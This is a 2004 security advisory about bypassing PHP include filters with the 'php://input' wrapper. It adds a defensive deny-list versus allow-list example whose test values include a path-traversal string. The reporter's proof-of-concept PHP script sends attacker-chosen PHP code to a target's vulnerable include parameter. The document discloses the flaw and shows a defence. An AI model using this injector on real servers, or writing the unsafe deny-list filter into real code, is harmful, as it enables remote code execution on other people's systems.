SecurityTracker.com
Category:  Application (Generic)  >  PHP
Vendors:  PHP Group
PHP 'php://input' Command May Let Remote Users Bypass Include Filters to Include Remote Code
SecurityTracker Alert ID:  1010326
SecurityTracker URL:  http://securitytracker.com/id?1010326
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  May 28 2004
Impact:  Host/resource access via network, Modification of user information
Exploit Included:  Yes  
Version(s): 3.0.13 and later versions
Description:  A vulnerability was reported in PHP. A remote user may be able to bypass include file filters.

Himeur Nourredine reported that a remote user may be able to bypass include filters that only check for the 'http://' or 'ftp://' strings by supplying 'php://input' as the include path and sending the PHP code in the body of a POST request.

The 'php://input' stream by design exposes the raw POST body, so an include() of that path executes whatever the request body contains.

A demonstration exploit is provided in the Source Message.

The report credits Slythers with discovering this flaw.

Impact:  A user may be able to bypass include file filtering restrictions.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.php.net/
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Himeur Nourredine <lostnoobs@security-challenge.com>
Message History:   None.
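The two sides of the issue the advisory describes, as an added example written for this page (it is not code from the advisory, the reporter, or the PHP project): a deny-list include filter that only rejects 'http://' and 'ftp://' prefixes, beside an allow-list replacement that never uses the request value as a path. The parameter name 'page' comes from the report's 'index.php?page=' usage; the keys 'home' and 'about' and the files under pages/ are assumed.

```php
<?php
// Added example, not from the advisory or the PHP project.
// Deny-list filter of the kind the report describes: it rejects remote URL
// prefixes but lets every other stream wrapper through, so 'php://input'
// reaches include() and the raw POST body is executed as PHP.
function vulnerable_include_target(string $page): ?string
{
    foreach (['http://', 'ftp://'] as $blocked) {
        if (stripos($page, $blocked) === 0) {
            return null;            // "filtered"
        }
    }
    return $page;                   // would be passed straight to include()
}

// Allow-list replacement: the request value is only a key into a fixed map
// of known files (paths assumed for this example). Anything that is not a key,
// whether a wrapper, a URL or a traversal sequence, resolves to null.
function page_map(): array
{
    return [
        'home'  => __DIR__ . '/pages/home.php',
        'about' => __DIR__ . '/pages/about.php',
    ];
}

function safe_include_target(string $page): ?string
{
    return page_map()[$page] ?? null;
}

// Constructed request values; the caller would include() a non-null result.
$requests = ['home', 'http://remote.example/x', 'php://input', '../../etc/passwd'];
foreach ($requests as $r) {
    printf("%-26s deny-list: %-20s allow-list: %s\n",
        $r,
        vulnerable_include_target($r) ?? '(blocked)',
        safe_include_target($r) ?? '(blocked)');
}
```

Run with `php` on the command line: the deny-list function returns 'php://input' (and the traversal string) untouched, while the allow-list returns null for everything except a known key. Independently of application-level filtering, including 'php://input' also requires the allow_url_include directive to be On; PHP 5.2 introduced that directive with a default of Off, so keeping it off stops the wrapper at the interpreter even where the application filter is missing.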


 Source Message Contents

Date:  27 May 2004 09:07:15 -0000
From:  Himeur Nourredine <lostnoobs@security-challenge.com>
Subject:  [PHP] include() bypassing filter with php://input

Information :
°°°°°°°°°°°°°°
Website : http://www.php.net
Version : PHP 3.0.13 =>
Problem : Include() bypassing filter


Proof of concept:
°°°°°°°° Exploit °°°°°°°°°
<------------ cut here ---------------->
<form action="" method="post" >
target server : <input type="text" name="server" ><br>
file : <input type="text" name="file" ><br>
exec : <input type="text" name="cmd" ><br>
<INPUT type="submit" value="send">
</form>

<?php
// register_globals-era script: $server, $file and $cmd arrive directly from the form fields.
if($cmd){
    // The request line appends php://input to the page parameter, e.g. index.php?page=php://input
    $message  = "POST /".$file."php://input HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    $message .= "Accept-Language: fr\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "Accept-Encoding: deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)\r\n";
    $message .= "Host: ".$server."\r\n";
    $message .= "Content-length: ".strlen( $cmd )."\r\n";
    $message .= "Connection: Keep-Alive\r\n";
    $message .= "Cache-Control: no-cache\r\n";
    $message .= "\r\n";
    // The POST body is what the target's include() reads through php://input
    $message .= $cmd."\r\n";
    $fd = fsockopen( $server, 80 );
    fputs($fd,$message);
    while(!feof($fd)) {
        echo fgets($fd,1280);
    }
    fclose($fd);
}
?>
<------------ cut here ---------------->

target server = "www.exemple.com"
file = "index.php?page="
exec = "<? phpinfo(); ?>"

Explanation
°°°°°°°°°°°°°°
You can bypass filter protection that parses for http:// or ftp:// ...
"php://input" allows putting data into the function include() by sending a request with PHP code in the POST method.

For More details :
°°°°°°°°°°°°°°
http://fr2.php.net/manual/en/wrappers.php.php

irc.fr.worldnet.net #s-c
Nourredine Himeur
www.security-challenge.com

This vulnerability was found by Slythers but he's too shy to publish the vuln ;)

greetz : mum , daddy , tcpteam , Nyx

Copyright 2004, SecurityGlobal.net LLC